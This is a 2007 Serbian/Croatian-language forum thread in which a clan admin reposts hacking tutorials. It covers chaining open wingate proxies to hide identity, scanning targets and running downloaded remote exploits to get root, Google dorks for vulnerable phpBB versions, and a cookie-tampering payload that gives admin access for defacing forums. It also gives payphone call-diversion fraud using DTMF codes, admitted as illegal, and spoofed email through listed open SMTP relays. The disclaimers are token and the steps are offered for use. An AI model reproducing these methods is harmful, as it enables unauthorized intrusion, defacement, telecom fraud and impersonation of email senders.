DMX CLAN
Would you like to react to this message? Create an account in a few clicks or log in to continue.

DMX CLAN

DMX CLAN
 
PrijemPortalliTražiLatest imagesRegistruj sePristupi

 

 >>>>hakerisanje<<<<

Ići dole 
2 posters
AutorPoruka
Intrus
Admin
Intrus


Broj poruka : 81
Godina : 32
Location : Beograd
Datum upisa : 10.12.2007

>>>>hakerisanje<<<< Empty
PočaljiNaslov: >>>>hakerisanje<<<<   >>>>hakerisanje<<<< Icon_minitimeNed Dec 16, 2007 12:35 am

Prvo.. pre nego sto pocnem da postujem razne tutorial i textove... morate da znate jedno!
nisam ja ovo pisao .. preuzeo sam sa drugih sajtova.. tako da nemojte postavljati glupa pitanja ako negde ima gresaka ili neki linkovi ne rade! :)

I jos nesto.. kad ovo sve procitas NISI HAKER! lol!
Nazad na vrh Ići dole
https://dmx-clan.serbianforum.info
Intrus
Admin
Intrus


Broj poruka : 81
Godina : 32
Location : Beograd
Datum upisa : 10.12.2007

>>>>hakerisanje<<<< Empty
PočaljiNaslov: Re: >>>>hakerisanje<<<<   >>>>hakerisanje<<<< Icon_minitimeNed Dec 16, 2007 12:36 am

Ovaj tutorial sam napisao jer stalno netko pita kako nesto haknuti,
kako se radi sa ovime,kako se radi sa onime i sl stvari,a u zadnje
vrijeme mi je i jako puno mailova doslo u vezi takvih pitanja...
To su glupa pitanja jer kao sto je vec milijun puta receno haker se
ne postaje preko noci,u stvari evo vam moja teorija,haker se ne postaje
haker jesi ili nisi,nema ja bi bio haker,haker mora imati zelju za ucenjem,
volju za znanjem i htjenje za napredovanjem e to je haker,ako kazes
ja sam haker,ako volis hakersku kulturu,zivis za racunala i programski
kOd onda si haker i nitko ti nemoze reci da to nisi,a to sto neznas
sve nije ni bitno,bitno je da te zanima,zato ne odustaj,vremena ima
i naucit ces sa vremenom...
I jos nesto,haking se ne uci - HACKING SE ZIVI !
Moras zivjeti kao haker da bi bio haker,a vi sami razmislite kakav je to
zivot.
Ja ne odgovaram za nista sto napravite nakon sto procitate ova tutorial.
Nadam se da ste shvatili poantu i ovo nije hacking,ovo je cracking,stoga
naucite ovo slobodno,ali nemojte bezveze rusiti stranice i sl. ako skuzite ovaj
tekst,jer hakeri sve znaju,a nikad ne rade ilegalne radnje,a ako rade,oni to
rade SA RAZLOGOM!(kad hakeru pukne film onda se j**i ... )


_-KAD OVO PROCITAS-_

Kad procitas ovaj tutorial NISI HAKER!!! To moras shvatiti.
I jos jednom napominjem da necu govoriti kako postati haker nego samo
crackiranje web stranica jer imate jako puno tekstova kako postati haker,
jow to become a haker,al moju teoriju ste vec procitali ...


_-STA JE POTREBNO-_

E,za ovaj tutorial vam netreba unix.Mislim,bilo bi mnogo bolje da imas unix,ali znam da
te mrzi instalirati a mozda ni to neznas pa... Sve u svemu potrebno je par wingate adresa i
shell account.Bez brige,objasnit cu sta je sta.
Posto i oko ovog ima tona tutoriala,necu zalaziti u detalje.Uglavnom,wingate je adresa na kojoj
se nalazi programcic koji je jako slican proxy-u.Postoji jako puno lose konfiguriranih wingate-a
i to se moze iskoristiti kako bi se postigla neka anonimnost.Anonimnost cete postici tako sto cete
se povezati preko telnet klijenta.Kasnije o tome.Shell account...sad cu jako pojednostaviti.
To je kao racun na nekom racunalu koji sluzi da biste mogli koristiti to racunalo sa
njegovim uslugama,ali sa odredjenim privilegijama.Ako ovo nije jasno,onda procitaj recenicu
jos jedno 10 puta,ako ni onda nije jasno,onda pokreni fifu i j**i si mater.
I trebat ce vam jedan port scanner.To je program koji trazi (skenira) otvorene portove na nekom racunalu.
Portovi su kao vrata preko kojih se spojis na neko racunalo i koristis usluge.Ako je na primjer
otvoren port pod brojem 21,onda to znaci da to racunalo ima FTP deamon,to je program koji
pruza usluge FTP-a (File transfer protocol). To je ono sto vam treba.


_-KAKO OSTATI ANONIMAN and SHELL ACCOUNT

Pa..ne mozes ostati potpuno anoniman.Ali moze se ostati dosta anoniman (kako glupa recenica).
Ja cu reci kako se moze ostati anoniman preko wingate-a.Postoje mnogi site-ovi na kojima se moze naci lista
wingate-a, a jedan od takvih site-ova je www.cyberarmy.com/lists
Tamo odaberite wingate,i ima jako puno adresa i portova (pricao sam o portovima).Recimo da ima
neka ovakva adresa: 195.29.22.11 (lupio sam adresu) koja je na portu 1080.Treba napraviti
sljedece:
Pokrenete telnet.To radite tako sto idete na Start,pa Run,i onda upisete telnet.Pojavit ce vam se
jedan program,koji bas i nije prelijepog dizajna,ali to nije ni vazno.Idete na Connect i onda
Remote System.
Poslije toga u Hostname upisite adresu na kojoj smo rekli da je Wingate,u ovom slucaju
195.29.22.11 .U polje port upisite 1080 (to sam rekao da Wingate na toj adresi radi na tom portu)
.Termtype treba biti vt100.
I onda klik na connect.Pricekajte malo i spojit ce se.Poslije toga se telnetirajte na svoj shell
account tako sto upisete nekaadresa.com 23
(23 je telnet port).U mjesto 23 mozete upisati i recimo 21,tako cete se spojiti na FTP
protocol.Sad ste koliko toliko anonimni.Savjetujem da linkate par wingate-a.To cete tako raditi
sto cete se umjesto telnetiranja na shell-account,telnetirati na adresu drugog wingate-a i
tako redom dok vam ne ponestane wingate adresa i onda se spojite na shell account.
Shell acc,sto je to,pa to je account kao sto imate i na HtNetu i sl sranjima,samo nema grafike
neko je tekstualno okruzje.
Najbolje za pocetak je uciti na freeshell.org(thx to fallen angel - HackGen),kada se spojite
pisite new i onda ce vam on ponuditi account,zatim odaberite login i pass i eto vas tamo.
Ukoliko neznate unix naredbe onda samo upisite unix i ona ce vam izaciti isto tako je dobra
naredba help (za pocetnike)koja ce vam sve objasniti...Ajmo dolje...



_-MALO OSNOVNIH UNIX NAREDBI-_

Savjetujem da kupite neku Unix/Linux knjigu i malo proucite ili u boljem slucaju skinite
sa neta.
E sad.Da biste vidjeli u kojem se nalazite direktoriju upisite ovu naredbu: pwd .Da biste
vidjeli koje fileove imate u direktoriju pisite : ls -al (ovim cete vidjeti i
privilegije....necu o tome).
Da biste se mogli kretati kroz direktorije koristite ove naredbe:
cd direktorij (ovim odlazite u zeljeni direktorij) ,cd .. (izlazite iz direktorija).Da
biste obrisali neki file koristite ovu naredbu:
rm file. Ako zelite obrisati sve u direktoriju tipkajte ovo: rm *.*
Eto to vam je od mene,a uvijek vam ostaje naredba :unix ,ne zaboravite jer vam se nece dati
stalno otvarati ovaj tutorial i jer ce vam ukoliko tek ucite o telnetu biti od velike pomoci.



_-NALAZENJE INFORMACIJA O SITE-U-_


Ovo je najvaznija faza kod upadanja u neki site.Postoji vise nacina i stvari koji se trebaju
otkriti.Treba otkriti Operativni sistem,otvorene portove, deamone i verzije koji rade na serveru.

--Operativni sistem
-Objasnit cu 2 nacina.Prvi je da se telnetirate na server ako ima otvoren telnet port 23.Tamo pise
koji je Operativni Sistem.
-Drugi nacin je netcraft.com
Idite na taj site i kliknite na link na kojem pise "Whats that site running" ili tako nesto.
Idite na taj link i upisite site koji vas zanima.
Tamo ce pisati sta taj site ima.Postoji jos nacina,kao sto je nmap ....ali bit ce ovo dosta za vas.

Zatim skenirajte otvorene portove sa port scannerom.
Telnetirajte se na svaki port i pogledajte sta pise,koja je verzija programa,ime....SVE ZAPISITE.
E,kad sve to zavrsite imate dosta informacija o site-u da biste mogli iskorisiti.



_-ISKORISTITI RUPU-_

E sad.Postoje stvari koje se zovu exploiti.To su programi koji iskoriste rupu u programu.Sa ovim
exploitima moguce je dobiti root na nekom serveru (root je svemocni user,ima sve privilegije).
Postoji vise vrsta exploita.Kao sto su Remote (ovo cemo mi koristiti) ,Local i DoS.
Mi cemo koristiti remote.Exploiti su 95% pisani u C-u,a ponekad i u PERL-u.E sad...posto vec
imamo informacije o site-u ostaje nam da nadjemo exploit i udjemo u server.Postoje site-ovi
gdje se oni mogu naci.
Dva najpoznatija i najbolja site-a su http://packetstorm.securify.com i http://www.hack.co.za
Tamo nadjite exploit za ono sto ste zapisali.Vazne su verzije programa!
E sad kada ste skinuli exploit i stavili ga na shell account preostaje samo kompajlirati exploit
i pokrenuti ga.
--Ako je exploit napisan u C-u onda trebate uciniti ovo:

gcc file.c -o file
Sada imate kompajliran exploit.Mozete ga pokrenuti sa:
file ili ./file
Sada ce vam ispisati usage.Ako pise recimo: Usage <site> <port>
onda cete ovako pokrenuti exploit:
./file www.nekisite.com 21
Malo pricekajte i usli ste.Sada samo koristite ono sto sam vam pokazao u sekciji o unix naredbama.

--Ako je napisan u PERL-u
Ako je napisan u PERL-u nema potrebe za kompajliranjem,jer je PERL interpretiran jezik
(ako ne znate nista o programiranju...onda ni ovo ne znate).Znaci samo pokrenite sa:
perl file.pl
Onda ce vam opet ispisati Usage,i opet ista prica.
Nazad na vrh Ići dole
https://dmx-clan.serbianforum.info
Intrus
Admin
Intrus


Broj poruka : 81
Godina : 32
Location : Beograd
Datum upisa : 10.12.2007

>>>>hakerisanje<<<< Empty
PočaljiNaslov: Re: >>>>hakerisanje<<<<   >>>>hakerisanje<<<< Icon_minitimeNed Dec 16, 2007 12:55 am

E sad ovo sa deface foruma.. mozda i nije prikladno da pokusavate na ovom hehehe
pokusajte ali ne radi! Very Happy

btw. ima jedna fora.. mozda se pitate gde naci bas tu verziju?

ovako.. ukucate u google

+powered by phpbb 2.0.17+ ili koja vam vec vezrija treba.. znaci samo zamenite brojeve..
a mozete posle toga da dodate hacked


+powered by phpbb 2.0.17+hacked i onda vidite koji su vec hakovani.. Very Happy
ma provalicete vi vec sami.. dovoljno je da se malo zainteresujete!
Nazad na vrh Ići dole
https://dmx-clan.serbianforum.info
Intrus
Admin
Intrus


Broj poruka : 81
Godina : 32
Location : Beograd
Datum upisa : 10.12.2007

>>>>hakerisanje<<<< Empty
PočaljiNaslov: Re: >>>>hakerisanje<<<<   >>>>hakerisanje<<<< Icon_minitimeNed Dec 16, 2007 12:55 am

Deface starih foruma (Stari tut.)



Sve sto treba da imate je Mozila Firefox!
E ovako!
Kada instalirate Firefox trebate da nadjete gde se nalazi cookies.txt
on se obicno nalazi na
c:\Documents and Setings\vaskomp\Aplication Data\Mozila\Firefox\Profiles\i onda nesto slova brojevi\i tu treba da se nalazi cookies.txt
E kada ste to nasli treba da se registrujete na neki forum od 2.0.4 do 2.0.11 verzije..
kada ste se registrovali na neki forum odete u cookies.txt i treba da nadjete nesto ovako....
http://www.mycity.co.yu/ TRUE / FALSE 1141719211 phpbb2mysql_data a%3A0%3A%7B%7D
E saada na mycity nemojte da pokusavate jel neradi...
I sada kada ste nasli forum i vidite gore navedeno sve sto treba da uradite je da ovaj code
a%3A0%3A%7B%7D
zamenite sa ovim
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
znaci taj veliki stavite umesto malog....
E onda uradite save dokumenta cookies.txt
Ugasite mozilu firefox i odete na stranicu foruma
i dole treba da bude
go to administration panel
Ova fora radi u 98% slucajeva...
Uzivajte
P.S Najbolje je da koristite proxy
njega mozete da nadjete na
http://www.proxy4free.com/
Nazad na vrh Ići dole
https://dmx-clan.serbianforum.info
Intrus
Admin
Intrus


Broj poruka : 81
Godina : 32
Location : Beograd
Datum upisa : 10.12.2007

>>>>hakerisanje<<<< Empty
PočaljiNaslov: Re: >>>>hakerisanje<<<<   >>>>hakerisanje<<<< Icon_minitimeNed Dec 16, 2007 12:57 am

Disclaimer:

Odmah na pocetku da kazem da ovaj text sluzi samo u svrhu edukacije i da citatelji ovog texta, ako pokusaju napraviti bilo sto navedeno u temi, rade to na vlastitu odgovornost i ja kao autor ovog texta ne mogu odgovorati za slucaj da nesto krene nizbrdo (odvalite govornicu, tresne vas struja, hehe, ili vas uhvate na 'misiji' !!!)... Radi se o zaobilazenju zastite koju je HT postavio i samim tim krsite Zakon o Telekomunikaciji, Uporaba javnih telekomunikacijskih uredjaja!

A sad da predjem na stvar
Dakle, sve sto nam je potrebno za ovo je:
- Telefonska kartica (za HT tel. govornice)
- DTMF dialer (nije obavezan)
- Mobitel (sa saldom najmanje 5 kuna, ako ste na Prepaidu)

DTMF
- Vec je bilo govora o DTMF tonovima digitalnih centrala, pa se necu upustati u neke dublje stvari osim one jedne osnovne: SVE telefonske govornice rade na principu DTMF signala. Glavna karakteristika ovih tonova su ti sto centrala ne prepoznaje izvor DTMF-a, dakle to moze biti tipkovnica na telefonu ili neki izvor izvan telefonskog aparata (njegov mikrofon na koji je 'spojen' DTMF dialer =), sto znaci da je moguce birati broj bez izravnog kontakta tipkovnice na telefonu! To bi bilo dovoljno za ovaj 'tutorial' o divertanju tel. govornica =)


Zastita Telefonskih govornica
Ovdje cu opisati neke zastite tel. govornica
- Na tipkovnicama postoje tipke * i #, kada ih probate birati, na Displayu ce pisat ZABRANJENI BROJ.. dakle, specijalne funkcije su nam iskljucene .. hehe, netko se sjetio da bi se 'ekipa' mogla igrati vatrom =)
- Kada podignete slusalicu, Audio petlja Mikrofon-Zvucnik je iskljucena (ne, nije zbog mikrofonije, u pitanju je malo drukcija i 'ozbiljnija' stvar =), kada ste ubacili tel. karticu, mikrofon se aktivira tek nakon sto ste birali prva 3 broja! Dakle, nemoguce je odmah prikopcat DTMF dialer i birati!


Divertanje (preusmjeravanje)
Vjerovatno ste culi ili vidjeli na vasim mobitelima ili ste koristili vec opcije divertanja (preusmjeravanja) poziva. Takve usluge postoje i na fixnoj telefoniji (digitalnim telefonskim centralama)! Dakle, sad cu reci 2 koda koji ce nam trebati za ovaj tutorial:
*21*xxxyyyzzzq#
gdje je xxxyyyzzzq broj telefona na koji se poziv preusmjerava, moze biti bilo koji ispravan telefonski ili mobilni broj!
Ovo je code za bezuvjetno preusmjeravanje svih poziva, racunajuci i podatkovne (Data) pozive i ovaj kod ce nam jedini trebati!
#21#
Ovim kodom ponistavamo sve bezuvjetno preusmjerene pozive!

Izvedba Plana
A sad da konacno predjemo na ono 'pravo'!
Dakle, imate Telefonsku karticu sa sobom za slucaj da ne znate koji je broj govornice, imate DTMF dialer ili mobitel.. to je sve..
Ako nemate DTMF dialer, mozete umjesto njega korisiti mobitel (ja sam sve radio sa svojim Siemens C35, sto znaci da je 100% efikasan) umjesto DTMF dialera. Ovo radi sa vecinom mobitela, osim sto definitivno ne moze sa Alcatelom! (I hate Alcatels!)
Trebate prije nego sto pocnete sve raditi podesiti tipkovnicu vaseg mobitela tako da kad pritiskate tipke ispusta DTMF tonove (ako je jednolican zvuk na svakoj tipki, znaci da vas mobitel ne podrzava DTMF i ako nemate DTMF dialer uz sebe, necete moci divertat govornicu!!!!).
Vas mobitel je sada spreman preuzeti svrhu DTMF dialera =)

Nase tel. govornice imaju malu manu ! Kada se nazovu na njihov tel. broj (a SVAKA govornica ima broj na koji se moze nazvati), na njihovom displayu pise ' DOLAZNI POZIV'. To je OK.
Kada nazovemo tel. govornicu i nakon nekoliko trenutaka prekinemo zvanje a da se nitko nije javio, i govornica je prestala da zvoni na centrali postoji mali DELAY od cca 8 sekundi! Ovo cemo iskorisiti za nas pakleni plan

Dakle, nasli smo govornicu koju zelimo divertati..
Kada podignemo slusalicu na govornici, cut cemo signal na zvucniku. Kada puhnemo u mikrofon, na zvucniku se nece nista cuti >>> audio petlja je zatvorena, mikrofon je iskljucen, zastita radi =)
ne znamo joj broj?
- Ubacimo karticu, nazovemo s nje nas mobitel i na mobitelu vidimo koji je broj! Izvadimo tel. karticu i nazovemo govornicu =)
Govornica zvoni? - na dobrom smo putu =)
Sacekamo nekoliko puta da odzvoni i na mobitelu prekinemo pozivati! Sacekamo par sekundi (3 sec) da centrala izvrsi Call Interrupt i podignemo slusalicu.. GLE CUDA! Na displayu govornice pise DOLAZNI POZIV a na mobitelu ne pise da je zovemo (ne skida nam lovu s racuna ), na zvucniku daje STDB signal i kad puhnemo u mikrofon otkrijemo da je audio petlja mikrofon-zvucnik otvorena =)

Govornica je spremna za Blitz Phra/<ing =)
Predpostavimo da ste vec prije svega namjestili mobitel na DTMF tonove. Ili ako imate DTMF dialer, ne morate nista podesavati =)
U jednu ruku uzmite slusalicu govornice, a u drugu mobitel ili DTMF dialer. ZVUCNIK mobitela (ili dialera) prislonite na MIKROFON govornice i unesite ovaj kod:
*21*xxxyyyqqqz#, gdje je xxxyyyqqqz broj na koji preusmjeravate (recimo da je to broj vaseg mobitela, ali moze i bilo koji drugi broj). Ako je funkcija implementirana u centralu govornica bi trebala davati konstantan signal bez prekida i to znaci da je govornica PREUSMJERENA
Ako poslije toga bude davala isprekidani signal, funkcija joj nije podrzana! Pokusajte ponovo i ako par puta ne uspije, to znaci da cete morati naci novu zrtvu...

Imate svoj novi broj!!!!



Features
- Kada je sve proteklo ok, trebali biste imati preusmjerenu govornicu na vas mobitel (ili na bilo koji drugi broj)
- Linija podrzava DataCall (prenos podataka)
- Kada vas netko nazove na taj broj, placa cijenu LOKALNIH impulsa, bez obzira sto ste se vi javili na mobitel!!! (ostatak {diferencu} placa HT izravno sam sebi =))
- Jeftinije razgovaranje na mobitel
- Divert nije moguce PONISTITI (nemojte se plasiti, nema teorije da vas otkriju osim ako vas ne uhvate na djelu =)
- Imate novi tel. broj vaseg moba !



Zakljucak
Ovo radi provjereno na Siemens C/M35 mobitelima, sto ne mora znaciti da necete uspjeti sa ostalim aparatima, samo sto Siemens imaju najbolji zvucnik (nabolju kvalitetu zvuka bez distorzije, sto je jako bitno kad je DTMF ton u pitanju!!!), illi ako je Dialer u pitanju, radi na svakom uredjaju =)

Nadam se da cete se moci snaci u ovom svemu!
PoZ =)
Nazad na vrh Ići dole
https://dmx-clan.serbianforum.info
Intrus
Admin
Intrus


Broj poruka : 81
Godina : 32
Location : Beograd
Datum upisa : 10.12.2007

>>>>hakerisanje<<<< Empty
PočaljiNaslov: Re: >>>>hakerisanje<<<<   >>>>hakerisanje<<<< Icon_minitimeNed Dec 16, 2007 1:04 am

***Slanje anonimnog E-mail-a***



Nije toliko tesko kao sto mislite. Idete na Star/Run, zaitm da bi ste se telnetovali kucajte telnet25 i lupite OK.

Nakon spajanja dobicete neku poruku ovog tipa:



220 Howdy From mail.airmail.net

running Smail 3.1.30.16 (ESMTP) [d/o/u/g] ready

at Thu, 10 Oct 01 00:03:17 -500 (CDT)



*Onda kucajte:

mail from:nesto@nesto.com (ovde naznacavate od koga je mail)

Poruka(koju dobijate od servera):

250 Sender <nesto@nesto.com> Ok... Posiljalac je OK

*Kucate:

rcpt to:nekome@nekome.com (ovde naznacavate kome saljte mail)

Poruka:

250 Recipient <nekome@nekome.com> Ok ... Primalac je OK

*Kucate:

data

Poruka:

354 Enter mail, end with "." on a line by itself ili

na nekim serverima

354 Ok Send data ending with <CRLF>.<CRLF>

*Kucate:

To: nekome@nekome.com

From: nesto@nesto.com

Subject:

Ime mail

Napisite ovde sta god zelite jer ovu poruku dobija neko ko ne zna od koga je stvarno...

(. govorite serveru da ste zavrsili poruku).

Poruka:

250 Mail accepted

ili message recieved

*Kucate:

quit



**********************************************Poruka je uspesno poslana. Ok,

sada cemo napisati samo sve komande koje ste kucali.



MAIL

FROM:nesto@nesto.com

RCPT TO:nekome@nekome.com

DATA

From: nesto@nesto.com (Name)

To: nekome@nekome.com

Subject: Ime mail

Reply-To: nesto@nesto.com

Vasa poruka......

.

QUIT







To je to, sada znate kako poslati anonimni mail, nije bolilo toliko tesko zar ne. Pokusajte poslati sada sami neki mail.

Ovo su serveri sa kojima mozete to raditi:



mail.bih.net.ba:25, mail.airmail.net:25 , mail.geocities.com:25 , mnsi.net:25 hacker.com:25 , mail.iaw.on.ca:25 , pdx.sisna.com:25 , jaring.my:25, chollian.dacom.co.kr:25, all-yours.net:25 , plix.com:25 , ids.net:25 , student.uq.edu.au:25

istar.ca:25 , total.net:25 , mail.tfs.net:25 , ecis.com:25 , mindspring.com:25 popmail.uc.edu:25 , mail.atcon.com:25 , future.net:25 , aloha.net:25 , ovnet.com:25 connect.reach.net:25 , valley-internet.net:25 , valleynet.com:25 , milo.cfw.com:25 scs.august.com:25 , hiwaay.net:25 , clandjop.com:25 , unix.diisd.k12.mi.us:25 , erie.net:25 , voyager.net:25 , awod.com:25 , netforward.com:25 , netcreations.com:25

mail.wantree.com.au:25 , ns.net:25, microserve.net:25 , wbs.net:25 , hwg.org:25, eff.org:25 , europe.std.com:25 , misty.com:25 , succeed.net:25, mail.discovery.com:25

cnet.com:25 , nytimes.com:25, w3.org:25 , mail.audionet.com:25 , mit.edu:25.
Nazad na vrh Ići dole
https://dmx-clan.serbianforum.info
[DMX]Zokinho
Admin
[DMX]Zokinho


Broj poruka : 137
Godina : 32
Location : Novi SAD
Datum upisa : 10.12.2007

>>>>hakerisanje<<<< Empty
PočaljiNaslov: Re: >>>>hakerisanje<<<<   >>>>hakerisanje<<<< Icon_minitimeNed Dec 16, 2007 12:38 pm

svaka cast brate ali mrzime da citam
Nazad na vrh Ići dole
Intrus
Admin
Intrus


Broj poruka : 81
Godina : 32
Location : Beograd
Datum upisa : 10.12.2007

>>>>hakerisanje<<<< Empty
PočaljiNaslov: Re: >>>>hakerisanje<<<<   >>>>hakerisanje<<<< Icon_minitimeNed Dec 16, 2007 4:14 pm

[DMX]Zokinho ::
svaka cast brate ali mrzime da citam


Ja sam postavio.. pa koga zanima nek izvoli lol!

btw. nikoga ja ne teram da hakuje hahahah xD
Nazad na vrh Ići dole
https://dmx-clan.serbianforum.info
Sponsored content





>>>>hakerisanje<<<< Empty
PočaljiNaslov: Re: >>>>hakerisanje<<<<   >>>>hakerisanje<<<< Icon_minitime

Nazad na vrh Ići dole
 
>>>>hakerisanje<<<<
Nazad na vrh 
Strana 1 od 1

Dozvole ovog foruma:Ne možete odgovarati na teme u ovom forumu
DMX CLAN :: Ostalo :: Tricks nad Tips-
Skoči na: